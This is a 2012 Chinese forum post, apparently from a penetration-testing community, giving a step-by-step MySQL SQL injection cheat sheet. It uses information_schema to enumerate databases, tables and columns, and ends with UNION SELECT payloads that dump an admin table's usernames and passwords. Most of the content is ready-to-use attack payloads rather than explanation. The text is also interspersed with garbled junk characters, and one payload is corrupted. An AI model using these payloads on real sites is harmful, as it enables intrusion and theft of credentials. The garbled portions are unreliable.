中国网络渗透测试联盟

标题: mysql常规注入 [打印本页]

作者: admin    时间: 2012-9-13 17:48
标题: mysql常规注入
本文介绍MYSQL盲注的一些语句和方法
! ]+ r( |" D+ D2 _( M
; X9 t, s  p6 n& S  N( Z  P. X学习盲注前先了解下 IFORMATION_SCHEMA 库% D6 q7 M0 U& ]* p# z( x( f) k
% _7 D. k: t* M2 Y
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有( I' h# Y" f, r9 R/ W
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。4 E8 X4 }8 H$ u7 K9 h
1.得到所有数据库名:; i( E# Z5 ~6 v3 I
|SCHEMATA ->存储数据库名的表
6 ]- K# L( t) p4 S, ]* g# a|---字段:SCHEMA_NAME ->数据库名称, T; L! C8 [$ z
6 m6 S  D# c9 y: ~6 {3 i/ N5 ?
|TABLES ->存储表名0 ^- m5 B  z" Y" Y) [
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名8 J. K' O$ M# _1 d2 j- u" m
|---字段:TABLE_NAME ->存储表的表名
. b9 [2 K. A$ z) {  _7 x4 P9 K$ @
2 i; d: f4 x% Z5 w|COLUMNS ->存储的字段名表% g/ Q# f& O; T9 }% r3 O6 d
|---字段:TABLE_SCHEMA ->该字段所属数据库名
; Z$ r/ r" h; y9 M' v0 T|---字段:TABLE_NAME ->存储所属表的名称; S+ D: M) C* M" ~

1 S, G- x5 b( W! }|---字段:COLUMN_NAME ->该字段的名称# d5 t* t3 r8 L1 |

* `. Y8 K( N9 b. x
/ S# N* S% ?) G9 |; e: l. r4 L* ~
###########################################################################! K8 T3 B6 w; r4 [: e- e  }
. U/ T* ]3 `  n, }! k3 ?
0x001 获取系统信息:
( F, }  r% B/ {) a4 C% q# n( x; E4 K& i* x  o" I& {3 N5 V/ \6 g1 g3 i5 G
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*6 Z+ c7 f, T4 ?1 j
+ |/ l1 l) s8 n7 P9 Q" y5 h
/*
5 V: |5 ^( o6 \1 t1 \7 F4 |: E. x+ V( Z- C- v2 Z& X$ b! P# D: E* S' Q+ c
@@global.version_compile_os 获取系统版本# b! F* H3 t' i
+ \/ V& z/ m* u
@@datadir 数据库路径
/ I, M# d- _; }4 A& F' g+ H9 idatabase() 当前数据库名称/ x# S/ h( ~( M1 L
0x3c62723e 换行HEX值
0 ^4 S) y) @: c# @0 G- m6 B3 V2 i7 q9 q  v9 `5 ^. |. m7 f& V2 z
*/( ?& b$ b3 }. y, [# Q! u$ D2 y3 w
) ]7 _* B' G' ~8 A+ S+ f6 }

3 p5 e2 z; d6 ]/ ~* H8 e
% t! |. N0 o1 O! C: C( y) S######################################################################
1 h  p0 G/ g5 W7 M8 K
8 F& a; h$ Y- d: g3 d4 ]  u! \0x002 获取表名
- P9 r9 _; J, m
. L6 Y0 q- A* E3 w. t# G* ]union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
- D& k# ]: D. ?9 }' q2 T
) c5 Z! P  I) Z  _: J ' M5 q: G1 ?8 n( k5 q; c5 F1 k

5 }* V* Z+ ~: h# y+ w* v/*" e1 j% j8 O& C; L8 h
. D" \$ m" X3 t& B) H3 b
0x67617264656e 为当前数据库名  z+ L" [4 O. L% W0 m
# b) Q' E: V5 |. ^! v2 x4 Q8 F$ w
group_concat(table_name) 使用group_concat函数 一步获得该库所有表名0 i) \3 r0 u/ |2 L3 ]
$ y* L) B3 y: v* T: j5 Q  Y
*/
. d6 x+ Y2 U  \( F& a4 ~( x' j( e- [6 |
######################################################################7 o) }3 Z" R% X  F8 Z
3 O2 u- V1 n& m: q" P

  S* L5 B" d/ L& L- I
/ ^+ g  a- @# O# @0x003 获取字段
+ P2 ~/ c& Z" B! v" W! J7 `
! E& h* I0 x2 U; I7 @9 b6 Zunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
$ |$ f6 N9 r. I- r  ], T
# O0 h0 J+ ]* Q7 G/*2 {, W$ J% q! x/ ?$ U( R

$ u" ~$ h: |2 ], rgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
& p* F+ x7 R8 _; W. \6 D* W6 ~1 ^7 A7 T+ K
0x61646d696e ->选择一个表
, w, y3 R5 ~: n/ P* o
9 d' g; h5 {% d& D9 E2 s0 j- A0 P7 K0x67617264656e ->数据库名
/ ]# n9 O0 F: w' c
1 R) d. e7 g, u2 ^+ d! Y7 J7 l, x: r*/! f8 |$ h+ H& S; H7 o, X
9 g2 y* [9 s5 u" q
#####################################################################2 E. Z; T7 z8 G

0 H( k# J4 e$ d! [8 s* R5 N  [   U& a$ V  i5 Q- @3 h/ f/ I, G! p
8 P4 J2 R. t: W/ d4 X! m5 s$ O$ h2 T
0x004 获取数据
9 p3 o5 e$ V! v! k: s) [  ]' I7 E. i; }5 ~3 f3 t
union select 1,2,3
7 G1 k5 ?5 d$ P& o, d,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
9 s- d/ C0 H8 H* Y: A
+ P- _  b( X: ?0 Zunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin3 D; G0 X; t. V  O  P

0 T9 d4 J, N' M& O5 x 3 F, S* f% L$ `5 l% ~, {3 u

/ W. j& [7 {+ I, O( j5 r3 I/*9 ], u7 x# f1 J; O9 _. X

1 C7 r. H6 D# T" [/ h- a& q, \0x3c62723e 换行符号HEX编码
$ B& o( ~  m- a3 o" t
  s' i. q6 f  G' Egroup_concat 同时获得该字段所有数据
' X2 j3 ?, q( G  |' c2 X
9 g1 q+ a4 h7 P% V" e: O9 O$ c$ F*/7 x/ K# B  t, g6 r
2 [4 ^4 e2 u/ t/ R' C





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2